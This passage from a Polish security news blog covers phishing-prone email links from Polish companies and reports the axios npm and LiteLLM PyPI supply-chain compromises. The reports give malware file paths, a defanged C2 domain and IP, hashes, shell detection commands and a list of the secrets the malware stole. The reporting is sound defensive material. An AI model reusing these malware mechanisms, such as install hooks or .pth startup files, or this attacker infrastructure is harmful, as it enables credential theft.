Trzeci przypadek: PGNiG (Grupa Orlen). Ta firma w przeszłości ostrzegała przed phishingiem, ale jak widać poniżej, trochę “przyucza” do niego swoich klientów.

Mail od PGNIG

Link w mailu ma treść “Zapłać online” co sugeruje przejście od razu do płatności, jednak tu również klient najpierw przekierowany jest do eBOK, potem może przeklikać się do opcji płacenia. Dodajmy, że wyłudzenie dostępu do konta w takim eBOK też miałoby swoją wartość. Są tam dane o punktach poboru, poprzednich fakturach itd.

Wszystkie trzy podmioty odpytaliśmy o tę sprawę i zadaliśmy im kluczowe pytanie. Czy bylibyście Państwo skłonni zmienić te praktyki?

Vectra: “Tak… ale… tego się nie da tak szybko zmienić…”

Vectra po otrzymaniu pytań odpisała nam dwukrotnie. Najpierw zapewniono nas, że problem jest istotny i będzie analizowany. Potem dostaliśmy drugą, właściwą odpowiedź.

Dzień dobry Panie Marcinie
bezpieczeństwo cyfrowe naszych klientów jest dla nas niezwykle istotne i traktujemy je z najwyższą powagą. Spółka ustawicznie pracuje nad rozwijaniem różnorodnych, wielopłaszczyznowych elementów bezpieczeństwa, w tym dedykowanych dla Abonentów. Zgadzamy się, że należy podejmować wszelkie możliwe działania, by jak najskuteczniej eliminować zagrożenia, jakie niesie za sobą phishing, w szczególności ten w zakresie nieufania jakimkolwiek linkom zawartym w korespondencji. Jesteśmy świadomi zagrożeń i dlatego edukujemy stale w tych kwestiach zarówno naszych Klientów jak i pracowników oraz kontrahentów.
Korespondencję masową, do której odniósł Pan swoje uwagi, charakteryzuje długi okres wdrażania nowych rozwiązań. Wynika to choćby z konieczności w tym zmiany dotychczasowych przyzwyczajeń w zakresie korzystania z wdrożonych udogodnień przez Abonentów i użytkowników, czy wyjaśniana przyczyn wprowadzanych zmian. Kluczowe w tym procesie jest także dostosowywanie się do percepcji i zgłaszanych potrzeb Klientów, które wynikają z ich różnego poziomu świadomości i umiejętności w korzystania z usług cyfrowych.
W odniesieniu do podniesionej przez Pana kwestii eliminowania akcji odnośników, systematycznie ograniczamy ich liczbę i dążymy do pełnej ich eliminacji. Równolegle promujemy nasze systemy eBok, które stanowią bezpieczny i alternatywny, w tym zabezpieczony przez 2FA, kanał komunikacji, także dla korespondencji elektronicznej (e-mail).
Podkreślamy, że nasze działania w obszarze zmian w komunikacji masowej muszą być wdrażane rozważnie i muszą adresować potrzeby naszych klientów. Nie możemy nikogo wykluczać z możliwości i korzyści, jakie dają usługi cyfrowe.
Z pozdrowieniami
Biuro prasowe Vectry

Czyli – jak rozumiemy – niektórzy ludzie bez linka nie ogarną płatności i dlatego te linki są… systematycznie eliminowane. Bardzo cieszy nas fakt, że Vectra rozumie problem, ale jednocześnie mamy wrażenie, że nie w pełni.

PGNIG: “To link do eBOK więc nie ma problemu!”

PGNIG też nam odpowiedziało.

Szanowny Panie Redaktorze,
w PGNiG Obrót Detaliczny, Grupa ORLEN, dbamy o bezpieczeństwo klientów, w szczególności w obszarze usług cyfrowych. W ramach konsekwentnie realizowanej strategii chronimy dane oraz wspieramy klientów w bezpiecznym korzystaniu z oferowanych rozwiązań, m.in. poprzez informację i edukację (przykładem mogą być publikacje na naszej stronie internetowej: Ostrzeżenie przed fałszywymi mailami | PGNiG OD).
Po Pana zgłoszeniu dokonaliśmy ponownej analizy naszej korespondencji z klientami. Wynika z niej, że w żadnym z szablonów wiadomości nie ma linków prowadzących do bezpośredniej płatności. Zamieszczone w nich odnośniki kierują do konkretnych procesów serwisu samoobsługowego eBOK i wymagają autoryzacji poprzez zalogowanie.
Mamy jednak świadomość, że dotychczasowy opis działania „zapłać on-line” mógł wprowadzać w błąd, sugerując niektórym użytkownikom, że link przekierowuje bezpośrednio do tzw. bramki płatniczej. W związku z tym dokonaliśmy korekty opisu na „zaloguj i zapłać”, wskazując jednoznacznie, że cały proces uzyskania wcześniejszego dostępu do systemu PGNiG Obrót Detaliczny.
Serdecznie dziękujemy za Pana zgłoszenie, które przyczyniło się do zmiany, którą wdrożyliśmy.
W razie pytań pozostaje do Pana dyspozycji.

Zadaliśmy spółce dodatkowe pytania starając się delikatnie wyjaśnić, że zamieszczanie w mailu linka do jakiejkolwiek strony logowania nie jest najlepszym pomysłem. Do momentu pisania tego tekstu nie otrzymaliśmy żadnych dodatkowych odpowiedzi.

Luxmed: Prowadzimy prace “na rzecz wprowadzenia bezpieczniejszych metod”

W imieniu Luxmedu odpowiedział nam Łukasza Niewola, Dyrektor Departament Komunikacji Korporacyjnej i Zrównoważonego Rozwoju. Tu również odpowiedź jest w stylu “chcielibyśmy coś zmienić, ale jeszcze nie zmieniamy”.

Grupa LUX MED stale udoskonala jakość usług, wprowadzając funkcjonalności dostosowane do potrzeb pacjentów, starając się zachować przy tym najwyższe standardy bezpieczeństwa. Linki do płatności w komunikacji e-mailowej są stosowane w ściśle określonych przypadkach. Przed wysłaniem e-maila z linkiem pacjent jest informowany, że go otrzyma i mam możliwość skorzystania z tej formy płatności. Jednocześnie podkreślamy, że w wiadomościach e-mail potwierdzających rezerwację wizyty, czy przypominających o wizycie nie wysyłamy linków do płatności.
Obecnie trwają zaawansowane prace, które mają na celu wygasić tę formę płatności na rzecz wprowadzenia bezpieczniejszych metod. W najbliższym czasie nasi pacjenci będą mogli dokonać płatności przez Portal Pacjenta LUX MED lub stronę sklep.luxmed.pl.
W zdecydowanej większości płatności za usługi dokonywane są przez naszych pacjentów w centrach medycznych przed wizytami.

Co robić? Jak żyć?

Nigdy nie powinieneś płacić czy logować się po kliknięciu w link z e-maila. Najlepiej samodzielnie wejść na właściwy serwis internetowy nadawcy i poszukać akcji/opcji o której informuje Cię w e-mailu. Wtedy masz pewność, że klikasz po właściwym serwisie. Jeśli po kliknięciu w link widzisz formularz logowania lub płatności, to popatrz na adres URL. Zweryfikuj też szczegóły ewentualnej płatności (kwota, odbiorca), bo bramka płatności może być prawdziwa, ale pieniądze niekoniecznie powędrują tam gdzie myślisz lub w kwocie której się spodziewałeś.

A jeśli prowadzisz firmę i oferujesz jakąś usługę zwykłym konsumentom, nie proponuj im płatności e-mailem po kliknięciu w link.

Ryzyk czyhających na internautów jest więcej. Opowiadamy o nich w trakcie wykładu “Jak nie dać się zhackować?“, który już w kwietniu odbędzie się w Krakowie i Warszawie. Zobacz pełną agendę tego wykładu i terminy. PS. Można (a nawet powinno się) na ten wykład wysłać lub przyjść z nietechnicznymi znajomymi!

Poważny atak programistów. Popularna biblioteka axios była zainfekowana.

2026-03-31T08:36:24Z

Oprogramowanie na twoim komputerze korzysta z Node’a? I masz w paczkę axiosa jako zależność? Rzuć wszystko i sprawdź z jakiej wersji korzystasz. Ktoś wstrzyknął do tej biblioteki złośliwy kod. Jeśli ją pobrałeś, Twój sprzęt i klucze chmurowe są w rękach przestępców.

Co się stało?

Właśnie odkryto kolejny poważny atak na łańcuch dostaw. Tym razem oberwała popularna biblioteka programistyczna axios powszechnie wykorzystywana do generowania żądań HTTP (pobierana ok. 100 milionów razy tygodniowo!). Tuż po północy atakujący przejęli kontrolę nad kontem npm twórcy biblioteki axios i opublikowali dwie złośliwe wersje, omijając pipeline CI/CD oparty o GitHub Actions i OIDC (Trusted Publisher). Skorzystali po prostu z ręcznej publikacji z pomocą wykradzionego developerowi długoterminowego tokenu dostępu (kto wie, może ów developer, czyli jasonsaayman jest ofiarą ostatniego ataku na LiteLLM?).

Oto zainfekowane paczki:
1.14.1 (31 marca o 00:21 UTC, tag latest) 0.30.4 (31 marca 01:00 UTCtag legacy)

Zachowanie wstrzykniętego złośliwego kodu różni się między systemami:

Windows: Nadpisuje i chowa się pod fałszywym plikiem Windows Terminal (%PROGRAMDATA%\wt.exe), po czym odpala złośliwego PowerShella. (np. %TEMP%\6202033.ps1, %TEMP%\6202033.vbs)
macOS: Udaje demona systemowego, zrzucając plik do rzadko sprawdzanego katalogu /Library/Caches/com.apple.act.mond (plus pliki pod $TMPDIR/6202033).
Linux: Instaluje pythonowego backdoora w /tmp/ld.py.

Malware łączy się z C2 pod adresem sfrclak[.]com:8000 i wysyła dane o Twoim środowisku, nasłuchuje poleceń oraz zaciera za sobą ślady usuwając pliki instalacyjne. Daje też atakującemu możliwość zdalnego wykonania kodu (RCE).

IoC:
IP Serwerów C2: 142.11.206[.]73
Domena kampanii C2 i URL: http://sfrclak[.]com:8000/6202033 oraz sfrclak[.]com (do odrzucenia na poziomie /etc/hosts / iptables)
Złośliwe emaile: ifstap@proton.me oraz nrwise@proton.me
SHA-256 Sumy pakietów w przestrzeni npm:
złośliwy axios w. 1.14.1 – 2553649f232204966871cea80a5d0d6adc700ca
złośliwy axios w. 0.30.4 – d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71
złośliwy pakiet plain-crypto-js w. 4.2.1 – 07d889e2dadce6f3910dcbc253317d28ca61c766
Payload ld.py – fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf
pierwszy dropper setup.js – e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

Szczegóły techniczne ataku

Atak był dość dyskretny, nie zmodyfikowano ani jednej linii kodu źródłowego axiosa (co mocno utrudniało wykrycie problemu m.in. z pomocą bazujących na kodzie skanerów typu diff). Jedynymi modyfikacjami w pliku package.json było dodanie złośliwej zależności plain-crypto-js: “^4.2.1” oraz usunięcie natywnego skryptu “prepare”: “husky”.

Nowa zależność nigdy nie była importowana, jej celem było osadzenie instrukcji wywoływanej przy pobieraniu pakietu w tle: “postinstall”: “node setup.js”. Nieźle to zaplanowano, bo pakiet plain-crypto-js udostępnił na nowym koncie na platformie ProtonMail inny osobnik, podpisujący się jako nrwise (nrwise@proton.me). Pierwsza wersja z pełnym fałszywym i nieaktywnym kodem (4.2.0) została umieszczona w serwisie 30 marca o 05:57 UTC, a zainfekowana (4.2.1) o 23:59 UTC, czyli tuż przed wstrzyknięciem jej do złośliwego axiosa. Aby uśpić czujność ewentualnych badaczy, plain-crypto-js podszywał się pod inną, bezpieczną bibliotekę crypto-js poprzez linkowanie opisu, aż po kopiowanie dziesiątek z oryginalnych plików (m.in. aes.js o rozmiarze 8649 bajtów, blowfish.js, md5.js, sha256.js, itp.).

Jedyne obce i groźne pliki we wstrzykniętym archiwum to zaledwie jedno-linijkowy setup.js (wielkości 4209 bajtów) oraz czysty szablon konfiguracji package.md o rozmiarze 725 bajtów. Tutaj pełna analiza wstrzykniętego trojana.

Mam Axiosa — co robić, jak żyć?

Jeśli zainstalowałeś wersję 1.14.1 lub 0.30.4, musisz założyć najgorsze. Atakujący mogli mieć całkowity dostęp do Twojego systemu. Dlatego natychmiast:

Sprawdź czy masz zainfekowane paczki. Stepsecurity sugeruje wykonanie tych poleceń:
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4" grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4" ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED" # macOS ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED" # Linux ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED" # Windows (cmd.exe) dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED
Odłącz maszynę od internetu, zbierz ślady pod forensic, a jeśli nie zamierzasz lub nie potrafisz go przeprowadzać, to odtwórz maszynę z czystego backupu lub przeinstaluj.
Zrotuj klucze SSH, klucze API, tokeny NPM i inne sekrety. Nie zapomnij o plikach .env. Zmień hasła.

Na przyszłość: Jeśli nie musisz, nie pozwalaj paczkom na samowolkę podczas instalacji. Używaj flagi npm ci –ignore-scripts. Warto też zauważyć, że oba wydania pozbawione były commitów (brak pola gitHead), oficjalnych tagów w repozytorium GitHub (wywołanie GitHub API o tag v1.14.1 zwracało błąd 404) oraz SLSA provenance attestations, które w wersji poprzedniej (1.14.0 i 0.30.3) były obecne. Warto się zastanowić, czy nie wykrywać tego typu anomalii przy zaciąganiu nowych wersji paczek. Albo czy nie opóźniać instalacji nowych paczek o kilka dni — jak widać po ostatnich atakach, community dość szybko wykrywa ataki, więc zamrożenie wersji zależności może być dobrym ogranicznikiem ryzyka.

~/.config/uv/uv.toml exclude-newer = "7 days" ~/.npmrc min-release-age=7 # days ignore-scripts=true ~/Library/Preferences/pnpm/rc minimum-release-age=10080 # minutes ~/.bunfig.toml [install] minimumReleaseAge = 604800 # seconds

Jeśli potrzebujecie zadbać o bezpieczeństwo swoich projektów programistycznych od A do Z, to zapraszamy na nasze turbo-praktyczne szkolenie “Bezpieczeństwo Webaplikacji“, w ramach którego podczas praktycznych 2-dniowych warsztatów pokazujemy jakich błędów przy tworzeniu oprogramowania uniknąć i jak im zapobiegać. Średnia ocen tego szkolenia to 9,45/10. Oto najbliższe terminy tego szkolenia:

ZDALNIE: 14-15 maja 2026r. — UWAGA: zostały tylko 2 wolne miejsca
Ostatnio ktoś zarejestrował się 28 kwietnia 2026r. → zarejestruj się na to szkolenie

Kraków: 22-23 czerwca 2026r. — UWAGA: zostały tylko 4 wolne miejsca
Ostatnio ktoś zarejestrował się 13 kwietnia 2026r. → zarejestruj się na to szkolenie

Warszawa: 02-03 lipca 2026r. — zostało 8 wolnych miejsc
Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → zarejestruj się na to szkolenie

Wrocław: 07-08 września 2026r. — zostało 9 wolnych miejsc
Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → zarejestruj się na to szkolenie

Poznań: 14-15 grudnia 2026r. — zostało 9 wolnych miejsc
Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → zarejestruj się na to szkolenie

Podzielcie się tym info z kolegami i koleżankami z zespołów. Kto pierwszy w biurze wpisał w nocy lub nad ranem npm update, ten potrzebuje pomocy. Sprawdźcie też czy jakieś automatyzacje nie budowały/aktualizowały Wam przez noc softu/środowiska w oparciu o axiosa. Wygląda na to, że nocne kodowanie to jednak nie taki zen…

Jak Nie Dać Się Zhackować? Czyli nasz wykład dla każdego znowu w Twoim mieście :)

2026-03-30T08:39:33Z

Każdy, kto korzysta z komputera, smartfona i internetu powinien wiedzieć jak robić to bezpiecznie. Od lat, tego jak “nie dać się zhackować” uczymy nie tylko pracowników największych polskich firm na szkoleniach zamkniętych odbywających się w ich siedzibach, ale także każdego kto chce — wystarczy wpaść na nasz 3 godzinny, pełen praktycznych porad i widowiskowych pokazów wykład. Właśnie ruszamy w Polskę z jego 6, ulepszoną edycją — tym razem odwiedzimy następujące miasta (start o 17:30):

Jesteś z innego miasta? Nic nie szkodzi, tam pewnie też będziemy! Zostaw nam e-maila w polu poniżej, a powiadomimy Cię o kolejnych terminach:

Dlaczego warto przyjść na nasz wykład?

Poniżej 4 konkretne powody:

Prosty język.

osoby nietechniczne

rodzicami, dziadkami i znajomymi spoza branży IT

Praktyczne i proste do wdrożenia rady. Pokażemy Ci jak co zrobić, aby ochronić swoje pieniądze, dane i prywatność przed cyberatakami. Nauczymy jak zabezpieczyć swój komputer i smartfon — co włączyć, co wyłączyć, jakie darmowe aplikacje wart doinstalować.

Demonstracje ataków na żywo. W trakcie wykładu pokazujemy na publiczności niektóre z ataków. To robi wrażenie i pomaga lepiej zrozumieć jak powinna wyglądać poprawna reakcja.    

Gwarancja jakości. Wykład widziało już kilkaset tysięcy Polaków. Aktualna średnia ocena to 9,48/10.

Jeśli Cię przekonaliśmy, to:

Poniżej kilka opinii uczestników ostatnich edycji tego wykładu:

Fantastyczny wykład. 3 godziny to nie tak mało jak na jedno podejście, a nawet nie wiem kiedy minęły.

Wykład oceniam wysoko ponieważ, pomimo dosyć dużej wiedzy na ten tamat (interesuje się bezpieczeństwem, czytam niebezpiecznika od dłuższego czasu a od niedawna pracuje w dziale application security) i pomimo tego że się dużo nie dowiedziałem nowego, to naprawdę fajnie spędziłem czas :). Dostałem też, dodatkowej motywacji, aby jeszcze więcej edukować rodzinę i moich znajomych. Dzięki!

Przydatne były informacje które uświadomiły mi, jak bardzo ważne jest, żeby chronić swoje dane osobowe. Nie zdawałam sobie sprawy jak łatwo można je pozyskać. BARDZO podobał mi się sposób mówienia, lekkość językowa. Łatwa, i zrozumiała nawet dla osoby która nie zna się na tych informatycznych rzeczach :)

Przed wykładem wydawało mi się, że jestem w zasadzie bezpieczny, że nie tak łatwo kogoś “zhakować”. Po wykładzie zrozumiałem, że się myliłem. Jeśli ktoś jest odpowiednio zdeterminowany, posiada wiedzę i cierpliwość, to może to zrobić. Warto mu więc to utrudniać w każdy możliwy sposób.

Uczestnicy poprzedniego wykładu we Wrocławiu podczas jednego z eksperymentów :)

Tematyka wykładu “Jak nie dać się zhackować?”

W ramach trwającego łącznie 3 godziny wykładu (z 15 minutową przerwą w środku) pokażemy Ci:

Jak poprawnie zabezpieczyć komputer i smartfona, aby nie zostały one zhackowane przez cyberprzestępców
Jak nie paść ofiarą aktualnych oszustw internetowych, scamów i przekrętów

Jak najlepiej ochronić swoje pieniądze i jak bezpiecznie robić zakupy w internecie
Jak zabezpieczyć swoje dane i komunikację, aby nie zostały one przez nikogo przechwycone
Jak chronić swoją prywatność w trakcie korzystania z e-maila i serwisów społecznościowych
Jak bezpiecznie korzystać z bankowości internetowej

Powyższe zagadnienia zilustrujemy prawdziwymi przykładami ataków, jakie w ostatnich miesiącach dotknęły Polaków, a dodatkowo sami, na żywo pokażemy jak atakują cyberprzestępcy.

Podszyjemy się pod Pana prezydenta
Wykradniemy dane z telefonu komórkowego
Pokażemy jak szybko łamane są hasła Polaków
Zainfekujemy laptopa ofiary i będziemy ją podglądali przez wbudowaną w laptopa kamerkę
Przejmiemy kontrolę nad komputerem przy pomocy złośliwego pendrive’a albo ładowarki do papierosa elektronicznego

Wierzcie nam, że w trakcie tych pokazów szczęka opadnie Wam nie raz… Gwarantujemy, że nikt, kto weźmie udział w tym wykładzie, już nigdy nie będzie tym samym człowiekiem :)

Bilet na wykład możesz także kupić dla kogoś: Mamy, Taty, Babci, Syna, Znajomego. To idealny i praktyczny prezent “na święta”. Cena biletu to zdecydowanie mniejszy wydatek niż koszt jak musiałbyś ponieść, żeby posprzątać po ewentualnym ataku na bliską Ci osobę. Warto zadbać o swoich bliskich :)

Ktoś zatruł popularną pythonową paczkę z 97 milionami pobrań…

2026-03-25T11:16:29Z

Wczoraj, 24 marca, na oficjalnym repozytorium PyPI pojawiła się złośliwa wersja szalenie popularnej biblioteki LiteLLM (wersje 1.82.7 oraz 1.82.8). Czym jest LiteLLM? To opensource’owa “bramka”, która ułatwia programistom łączenie się z wieloma modelami językowymi (LLM) za pomocą jednego interfejsu API. To nie jest niszowy projekt, paczka ma na liczniku ponad 97 milionów pobrań.

Wystarczyło zainstalować. Nie trzeba było nawet uruchamiać!

Atakujący wykorzystali mechanizm ukrywania kodu w plikach z rozszerzeniem “.pth” (tzw. Python Startup Hooks). Wrzucony przez nich do zatrutej paczki plik “litellm_init.pth” był automatycznie wykonywany przy każdym uruchomieniu interpretera Pythona.

To oznacza, że programiści-ofiary nie musieli wcale pisać “import litellm” w swoim kodzie. Wystarczyło, że zainstalowali paczkę (np. poprzez pobranie innego projektu, który używał LiteLLM jako zależności), a ukryty złośliwy skrypt uruchamiał się w tle przy każdym wywołaniu Pythona. Złośliwy kod wykradał z systemu:

Klucze SSH, zmienne środowiskowe (a więc i klucze API), i pliki z konfiguracją Dockera.
Dane uwierzytelniające do chmur AWS, GCP, Azure oraz całe konfiguracje klastrów Kubernetes.
Klucze prywatne TLS, hasła do baz danych (PostgreSQL, MySQL, Redis) i pliki portfeli kryptowalutowych.
Historia powłoki (bash_history, zsh_history), gdzie często lądują hasła wpisywane “z palca”.

Wszystkie te dane są pakowane do archiwum tpcp.tar.gz, szyfrowane i wysyłane na serwer kontrolowany przez napastników: “models.litellm[.]cloud“. Wiecie więc już czego szukać w logach… Szacuje się, że ofiarą tego ataku mogło paść nawet 500 000 urządzeń. Ale mogło być gorzej…

Wpadka hakera zmniejszyła katastrofę

Co ciekawe, atakujący popełnili głupi błąd. Jak informuje Callum McMahon, wstrzyknięty kod zachował się u niego jak “fork bomba”. Złośliwy skrypt uruchamiał w tle kolejny proces Pythona, co powodowało, że ten nowy proces znowu czytał zatruty plik “.pth”, odpalając kolejnego Pythona i tak w nieskończoność. U niektórych programistów używających środowisk takich jak Cursor powodowało to natychmiastowe zużycie pamięci RAM do maksimum i zwieszkę kompa. Dzięki temu, że kod hakerów “wywalał” sprzęt, atak szybko zauważono, a paczkę usunięto z PyPI po niespełna 3 godzinach. Ale ponoć nie u wszystkich kod się zapętlał…

Kto stoi za atakiem i jak tego dokonał?

A teraz najlepsze. Za atak odpowiada grupa TeamPCP, która dostała się do infrastruktury LiteLLM poprzez wcześniejsze zhackowanie …skanera podatności Trivy, którego używano w procesie CI/CD (automatyzacji budowania i testowania kodu).

To klasyczny, wręcz podręcznikowy atak na łańcuch dostaw (ang. supply-chain attack) — co więcej o tym jak łatwo było wstrzyknąć coś w kod Trivy pisaliśmy w poprzednim artykule — zrobił to bot AI, wysyłając im Pull Requesta na GitHubie…

Co robić, jak żyć?

Jeśli używasz Pythona, to:

natychmiast sprawdź, czy w Twoim systemie lub kontenerach nie zainstalowała się wersja 1.82.7 lub 1.82.8 pakietu LiteLLM (pip show litellm). Szukaj też pliku “litellm_init.pth” w katalogach “site-packages” — a jak go tam znajdziesz, to usuń.

Jeśli go znajdziesz — współczujemy. Musisz założyć, że WSZYSTKIE hasła, klucze API i tokeny, które znajdowały się na tej maszynie (w tym te w plikach .env), są w rękach włamywaczy. Należy je natychmiast ubić/zrotować.

Chcesz wiedzieć jak bezpiecznie tworzyć kod aplikacji (nie tylko webowych)? To zapraszamy Cię na 2 dniowe, silnie praktyczne, niebezpiecznikowe szkolenie dla programistów “Atakowanie i Ochrona Webaplikacji”. Pokazujemy na nim najpopularniejsze błędy, jakie widzimy na testowanych przez nasz zespół bezpieczeństwa aplikacjach i uczymy wszystkiego, na co trzeba zwrócić uwagę podczas projektowania, budowy, testowania i deployowania kodu na produkcję. Najbliższe terminy znajdziesz poniżej (podaj podczas rejestracji w uwagach kod LITELLM, to zapiszemy Cię ze zniżką):

ZDALNIE: 14-15 maja 2026r. — UWAGA: zostały tylko 2 wolne miejsca
Ostatnio ktoś zarejestrował się 28 kwietnia 2026r. → zarejestruj się na to szkolenie

Kraków: 22-23 czerwca 2026r. — UWAGA: zostały tylko 4 wolne miejsca
Ostatnio ktoś zarejestrował się 13 kwietnia 2026r. → zarejestruj się na to szkolenie

Warszawa: 02-03 lipca 2026r. — zostało 8 wolnych miejsc
Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → zarejestruj się na to szkolenie

Wrocław: 07-08 września 2026r. — zostało 9 wolnych miejsc
Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → zarejestruj się na to szkolenie

Poznań: 14-15 grudnia 2026r. — zostało 9 wolnych miejsc
Ostatnio ktoś zarejestrował się 30 kwietnia 2026r. → zarejestruj się na to szkolenie

PS. Badamy zainteresowanie webinarem na temat szeroko rozumianego AI i bezpieczeństwa (zarówno od strony użytkownika jak i developera). Zainteresowany? To zostaw nam maila w polu poniżej — jak cykl wystartuje, wyślemy Ci powiadomienie:

Wpisz adres e-mail:

Rozwiąż Captcha:

HP

Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij tutaj.

Niebezpiecznik.pl (tylko główna)

Nowoczesne kadry w dobie cyfrowej transformacji

Sektorowe Ramy Kwalifikacji – „branża dla branży”

Kto najbardziej skorzysta z SRK IT, SRK CYBER i SRK TELE?

Zintegrowany System Kwalifikacji

Więcej informacji:

Masz Linuksa? To go szybko załataj!

Jak sprawdzić, czy jesteś podatny?

Dlaczego ten atak jest możliwy i dlaczego jest tak istotny?

Są plusy tego ataku…

Mam Linuksa — co robić, jak żyć?

⚠️ Uwaga na fałszywe e-maile o zwrocie podatku!

Wiele wariantów e-maila

Jak jeszcze można wykryć, że to scam?

Otrzymałem taką wiadomość, co robić, jak żyć?

Nadanie paczki przez InPost Mobile. Jak zrobić to wygodnie i bezpiecznie?

Nadanie paczki zaczyna się przed uruchomieniem aplikacji

InPost Mobile upraszcza nadanie paczki

Jak bezpiecznie nadać paczkę?

Najsłabszym ogniwem bywa wiadomość spoza oficjalnego kanału

Co naprawdę warto zrobić przed nadaniem paczki?

Wniosek

Jeżdżą po mieście i atakują telefony korzystając z SMS Blasterów ukrytych w bagażnikach

SMS Blastery w natarciu

Jak to działa i dlaczego jest groźne?

Trójka z Kanady

To nie są nowe ataki

Mam smartfona — co robić, jak żyć?

Dlaczego drukarki w stanie fabrycznym to stan zagrożenia, a nie gotowości

Rozgrzewka na macie

Dobra wiadomość: nie jesteś bezbronny.

Hardening drukarek: Jak się do tego zabrać?

Security Settings Navigator oczywiście nie jest lekarstwem na wszystko. Masz flotę? Potrzebujesz zarządzania.

O czym pisaliśmy w zeszłym tygodniu, ale ❌ NIE na Niebezpieczniku?

Dlaczego Twitter?

Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!

Od czego się zaczęło?

Jak sprawdzić, czy nie macie takich pracowników u siebie w firmie?

Vercel informuje klientów

Nie zwalajcie winy na AI (w tym przypadku)

“Ssijcie ruskiego k…” czyli partia Mentzena zhackowana po raz 3

To nie pierwszy hack partii Mentzena

Jak uchronić się przed takimi atakami?

Naprawdę dobrze dopracowany atak na właścicieli stron na Facebooku

Co się stanie, jeśli ktoś kliknie w link?

Co robić, jak żyć?

Jak można wykiwać Twoje agenty AI oraz boty AI kradnące treści z Twojej strony?

“Ić stont bocie!”

Co każdy pracownik powinien wiedzieć o AI?

Content Injection Traps (wstrzykiwanie treści)

Semantic Manipulation Traps (manipulacje semantyczne)

Cognitive State Traps (zatruwanie wiedzy/pamięci)

Behavioural Control Traps

Systemic Traps (pułapki na systemy)

Human-in-the-Loop Traps (pułapki na człowieka)

Mam swojego agenta AI – co robić, jak żyć?

Duże firmy przyuczają ludzi do phishingu (po tym jak przed nim ostrzegały)

Problem linków w e-mailach

Lux Med

Vectra: “Tak… ale… tego się nie da tak szybko zmienić…”

PGNIG: “To link do eBOK więc nie ma problemu!”

Luxmed: Prowadzimy prace “na rzecz wprowadzenia bezpieczniejszych metod”

Co robić? Jak żyć?

Poważny atak programistów. Popularna biblioteka axios była zainfekowana.

Co się stało?

Szczegóły techniczne ataku

Mam Axiosa — co robić, jak żyć?

Jak Nie Dać Się Zhackować? Czyli nasz wykład dla każdego znowu w Twoim mieście :)

Dlaczego warto przyjść na nasz wykład?

Tematyka wykładu “Jak nie dać się zhackować?”

Ktoś zatruł popularną pythonową paczkę z 97 milionami pobrań…

Wystarczyło zainstalować. Nie trzeba było nawet uruchamiać!

Wpadka hakera zmniejszyła katastrofę

Kto stoi za atakiem i jak tego dokonał?

Co robić, jak żyć?

Security Settings Navigator oczywiście nie jest lekarstwem na wszystko.
Masz flotę? Potrzebujesz zarządzania.